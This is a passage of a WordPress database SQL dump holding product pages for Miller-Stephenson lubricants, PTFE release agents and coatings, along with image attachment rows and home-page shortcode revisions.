INSERT INTO `wp_posts` VALUES (1672, 2, '2016-09-15 13:26:41', '2016-09-15 13:26:41', '', 'tribosys-connector-lubricant', '', 'inherit', 'open', 'closed', '', 'tribosys-connector-lubricant', '', '', '2016-09-15 13:26:41', '2016-09-15 13:26:41', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/tribosys-connector-lubricant.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1673, 2, '2016-09-15 15:13:05', '2016-09-15 15:13:05', '<h3>MS-124H Connector Lubricants</h3>\r\nMS-124H Connector Lubricant cleans, lubricates and protects multi-pin connectors.\r\n<h4>Advantages of MS-124H Connector Lubricant:</h4>\r\n<ul>\r\n 	<li>Reduces insertion forces</li>\r\n 	<li>Greatly increases mating cycles (especially important where high pin counts are involved)</li>\r\n 	<li>Extends connector life by preventing corrosion and galling</li>\r\n 	<li>Removes contaminates and oxides</li>\r\n 	<li>Forms no residue, even at high temperatures</li>\r\n 	<li>Is non-migrating-contains no silicones</li>\r\n 	<li>Available with a UV (ultraviolet) indicator</li>\r\n 	<li>No interference in electrical continuity</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>RoHS compliant</li>\r\n</ul>\r\nThe active ingredient of Connector Lubricant is a five (5) ring polyphenyl ether (PPE) lubricant. This lubricant will help protect metal connector surfaces from excessive wear, when subjected to hundreds of mating cycles, thereby increasing the life of the connectors. It will also reduce insertion forces and provide corrosion protection in harsh environments.\r\n\r\nOnly a very thin film is required on metal surfaces; therefore, the polyphenyl ether is usually diluted in a solvent. Various solvents and different polyphenyl ether concentrations may be used.\r\n\r\nConnector Lubricant is available in a 1% (aerosol) and 2% (bulk liquid) PPE concentration. This is the proper concentration for connectors operating at room temperature where there is little or no vibration.\r\n\r\nA Spectro EN-140 4-watt Long Wave UV Lamp may be used for UV detection.\r\n\r\nPhysical Properties: 5-ring Polyphenyl Ether\r\n\r\nMaximum Operating Temperatures 140°F/60°C\r\n\r\nNote: Higher temperatures result in shorter film life.\r\n\r\nSurface Tension @ 100°F 49.9 dyne/cm\r\n\r\nOxidation &amp; Corrosion Stability @ 600°F/48 hrs Steel (mg/∆) 0.02 Silver (mg/∆) 0.03 Copper (mg/∆) 0.14 Aluminum (mg/∆) 0.04 Acid Change ∆ 0.00 Thermal Stability 847°F/453°C Refractive Index @ 25°C 1.630 Note: Test for compatibility before use.', 'MS-124H', 'Same general applications as Connector Lubricant, MS-381HC but with a 5-ring polyphenyl ether lubricant. Thermal stability to 600°F/316°C. This 5-ring PPE can provide a 20-year film life provided that temperatures do not exceed 140°F/60°C. Contains no silicones and is non-migrating. Available with an ultraviolet (UV) indicator. Nonflammable. No ODC (ozone depleting chemicals).', 'publish', 'open', 'closed', '', 'ms-124h-connector-lubricant', '', '', '2016-12-16 20:28:43', '2016-12-16 20:28:43', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1673', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1674, 2, '2016-09-15 15:12:32', '2016-09-15 15:12:32', '', 'Connector Lubricant TriboSys', '', 'inherit', 'open', 'closed', '', 'connector-lubricant-tribosys', '', '', '2016-12-16 20:23:16', '2016-12-16 20:23:16', '', 1647, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/connector-lubricant-tribosys.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1676, 2, '2016-09-15 15:20:49', '2016-09-15 15:20:49', '', 'dryfilm-lubricant', '', 'inherit', 'open', 'closed', '', 'dryfilm-lubricant', '', '', '2016-09-15 15:20:49', '2016-09-15 15:20:49', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/dryfilm-lubricant.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1677, 2, '2016-09-15 15:27:36', '2016-09-15 15:27:36', '<h2>MS-122AD | Dry Film PTFE release agent</h2>\r\n<h3>Excellent Release Properties; Unmatched Dry Lubricant; Cost-Effective</h3>\r\nMS-122AD was developed as an efficient, economical and universal dry film PTFE release agent / dry lubricant. This formulation contains a high lubricity, low molecular weight PTFE fluoropolymer specialized for mold release and dry lubricant applications.  A nonflammable, non-ozone depleting carrier solvent / propellant mixture ensures all environmental regulations are met. MS-122AD offers the following benefits:\r\n<ul>\r\n 	<li>Cost-effective release of molded parts</li>\r\n 	<li>Outstanding lubricity and minimization of slip-stick</li>\r\n 	<li>Nonflammable, Non-ozone depleting formulation</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n</ul>\r\n<span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Miller-Stephenson has been developing PTFE release agents for over 40 years.  This class of release agent yields a uniform, dry film on the mold surface while also offering superior surface adhesion and durability.  PTFE mold release agents typically can last numerous molding cycles before re-application is necessary, and is ideal for compression and transfer molding operations.  One drawback is its relatively poor performance in injection molding, which requires surface slip that PTFE dry films cannot achieve. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics. </span>\r\n<h3 style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;">Why choose MS-122AD | Dry Film PTFE release agent</h3>\r\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Production engineers will typically choose Dry film PTFE release agent if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry. </span></p>\r\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Miller-Stephenson offers a selection of specialized formulations which provide high performance solutions for your molding process.  All variants of the MS-122 Series will deliver higher productivity, lower rejection rates, and higher quality products.  Please use the product selection guide below to help direct you to the appropriate product.</span></p>\r\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>\r\n\r\n&nbsp;', 'MS-122AD | Dry Film PTFE release agent', 'MS-122AD was developed as an efficient, economical and universal release agent and dry lubricant. This formulation contains a high lubricity, low molecular weight PTFE fluoropolymer specialized for mold release and dry lubricant applications.  A nonflammable, non-ozone depleting carrier solvent / propellant mixture ensures all environmental regulations are met. MS-122AD offers the following benefits:\r\n<ul>\r\n 	<li><strong>As a Release Agent: </strong>Highly effective when applied to rubber molds. Provides a very uniform, thin coating, ideal for routine mold release operations.</li>\r\n 	<li><strong>As a Dry Lubricant: </strong>Our best dry lubricant, for all applications; may be used on all surfaces, especially where there is metal on metal contact. Provides elimination of "slip-stick" and low coefficient of friction.</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'dry-film-ptfe-release-agent', '', '', '2017-06-05 12:22:31', '2017-06-05 12:22:31', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1677', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1678, 2, '2016-09-15 15:26:58', '2016-09-15 15:26:58', '', 'Dry Film PTFE release agent MS-122AD', '', 'inherit', 'open', 'closed', '', 'ms-122ad-dry-film-lubricant', '', '', '2016-11-23 18:56:00', '2016-11-23 18:56:00', '', 1677, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1679, 2, '2016-09-15 15:29:33', '2016-09-15 15:29:33', 'Miller-Stephenson Release Agent / Dry Lubricant uses the magic of Teflon chemistry to create suspensions of low molecular weight polytetrafluoroethylene (PTFE) fluoropolymers – white, waxy particles of PTFE with the slickness of Teflon in an easy to apply form. The outstanding lubricity and low coefficient of friction of PTFE is perfect for use as a dry film lubricant and as a release agent in molding operations.\r\nMS-122ADL is an excellent universal release agent, highly effective when applied to rubber molds. Provides a very uniform coating. An excellent dry lubricant for all applications. It may be used on all surfaces, especially where there is metal to metal contact.', 'MS-122ADL', '<strong>Low Global Warming</strong>\r\n<br /><br />\r\n<strong>As a Release Agent: </strong>An excellent universal release agent, highly effective when applied to rubber molds. Provides a very uniform coating.\r\n<br /><br />\r\n<strong>As a Dry Lubricant: </strong>An excellent dry lubricant for all applications. May be used on all surfaces, especially where there is metal to metal contact. Provides a very uniform coating. Nonflammable. Low GWP (global warming potential). No ODC (ozone depleting chemicals).', 'publish', 'open', 'closed', '', 'ms-122adl', '', '', '2016-09-15 15:35:31', '2016-09-15 15:35:31', '', 0, 'https://132.148.10.86/wordpress/product/ms-122adl/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1680, 2, '2016-09-15 15:34:12', '2016-09-15 15:34:12', '', 'ms-122adl-dry-film-lubricant', '', 'inherit', 'open', 'closed', '', 'ms-122adl-dry-film-lubricant', '', '', '2016-09-15 15:34:12', '2016-09-15 15:34:12', '', 1679, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-122adl-dry-film-lubricant.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1681, 2, '2016-09-15 15:55:27', '2016-09-15 15:55:27', 'Miller-Stephenson MS-122XD is a PTFE Dry-Film Lubricant / Release Agent that contain a suspension of low molecular weight polytetrafluoroethylene (PTFE) fluoropolymers – white,waxy particles of PTFE in an easy to apply form. The outstanding lubricity and low coefficient of friction of PTFE is perfect for use as a dry film lubricant and as a release agent in molding operations. MS-122XD and MS-143XD are excellent release agents with the added advantage of superior release action in the initial cycles. They work well for all applications. As a dry lubricant, they are a very good general purpose lubricant, which produces a uniform coating, good surface adhesion and minimization of mechanical wear..\r\n<h3><strong>Release Agent Applications</strong></h3>\r\nMS-122XD can be used to release the following materials with virtually no transfer of the release agent:\r\n<table style="height: 138px;" width="478">\r\n<tbody>\r\n<tr>\r\n<td width="140">•          Plastics</td>\r\n<td width="168">•          Rubbers</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Resins</td>\r\n<td width="168">•          Phenolics</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Acrylics</td>\r\n<td width="168">•          Polycarbonates</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Urethanes</td>\r\n<td width="168">•          Polystyrene</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Nylons</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3><strong>\r\nPTFE Dry-Film Lubricant Applications</strong></h3>\r\nAs a dry lubricant, MS-122XD is applicable on a variety of materials and will afford unmatched lubricity and wear resistance.  These materials include:\r\n<table style="height: 155px;" width="458">\r\n<tbody>\r\n<tr>\r\n<td width="140">•          Metal</td>\r\n<td width="168">•          Ceramics</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Glass</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Rubber</td>\r\n<td width="168">•          Polycarbonates</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Wood</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nMiller-Stephenson offers a selection of specialized formulations which provide high performance solutions for your molding process.  The MS-122 Series will deliver higher productivity, lower rejection rates, and higher quality products.  Please use the selection guide below to help direct you to the appropriate product.\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>', 'MS-122XD', '<strong>As a Release Agent: </strong>An excellent release agent with the added advantage of superior release action in the initial cycles. Works well for all applications. Produces a uniform coating.\r\n\r\n<strong>As a Dry Lubricant: </strong>A very good general purpose dry lubricant for all applications. Produces a uniform coating.', 'publish', 'open', 'closed', '', 'ms-122xd', '', '', '2016-11-23 19:20:27', '2016-11-23 19:20:27', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1681', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1682, 2, '2016-09-15 15:55:05', '2016-09-15 15:55:05', '', 'PTFE Dry-Film Lubricant MS-122XD', '', 'inherit', 'open', 'closed', '', 'ms-122xd-dry-film-lubricant', '', '', '2016-11-23 19:11:46', '2016-11-23 19:11:46', '', 1681, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-122xd-dry-film-lubricant.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1683, 2, '2016-09-15 17:15:52', '2016-09-15 17:15:52', 'Vydax™ NRT 960 is a translucent dry film coating that exhibits unique lubrication and anti-stick properties. The coating is clean, non-oily, nonstaining, chemically inert, and can function in continuous use in temperatures up to 200 °C (392 °F).\r\nThis product is non-flammable, CFCi and HCFCii -free. Vydax™ NRT 960 is oxygen safe and LOXiii compatible, as determined per ASTM G86. Components are not classified as, or are exempted from classification as, volatile organic compounds (VOC) by the US EPA.', 'Vydax™ NRT 960', 'A nonflammable, translucent dry film coating that has excellent lubrication and anti-stick properties. The coating is clean, non-oily, nonstaining, chemically inert, and can function in continuous use in temperatures up to 392ºF/200ºC. It is oxygen safe and LOX compatible, as determined per ASTM G86. No ODC (ozone depleting chemicals).\r\n', 'publish', 'open', 'closed', '', 'vydax-nrt-960', '', '', '2016-09-16 18:23:11', '2016-09-16 18:23:11', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1683', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1684, 2, '2016-09-15 17:13:26', '2016-09-15 17:13:26', '', 'krytox-vydax-dryfilm-lubricant', '', 'inherit', 'open', 'closed', '', 'krytox-vydax-dryfilm-lubricant', '', '', '2016-09-15 17:13:26', '2016-09-15 17:13:26', '', 1683, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/krytox-vydax-dryfilm-lubricant.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1685, 3, '2016-09-15 17:49:02', '2016-09-15 17:49:02', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<h2>SINCE 1955</h2>\r\n[/text_box]\r\n[text_box position_y="20"]\r\n<h3><strong>Quality &amp; Service</strong></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="5"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="10"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="5"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="15"]\r\n\r\n[button text=" MILLER-STEPHENSON MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="5"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="5"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n[divider]\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1588" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1624"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-15 17:49:02', '2016-09-15 17:49:02', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1686, 3, '2016-09-15 17:53:19', '2016-09-15 17:53:19', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="20"]\n\n<h3><strong>Quality &amp; Service</strong></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="5"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="10"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="5"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MILLER-STEPHENSON MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="5"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n[divider]\n\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1624"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-15 17:53:19', '2016-09-15 17:53:19', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1687, 3, '2016-09-15 17:54:30', '2016-09-15 17:54:30', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<h2>SINCE 1955</h2>\r\n[/text_box]\r\n[text_box position_y="20"]\r\n<h3><strong>Quality &amp; Service</strong></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="5"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="10"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="5"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text=" MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="5"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n[divider]\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1588" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image 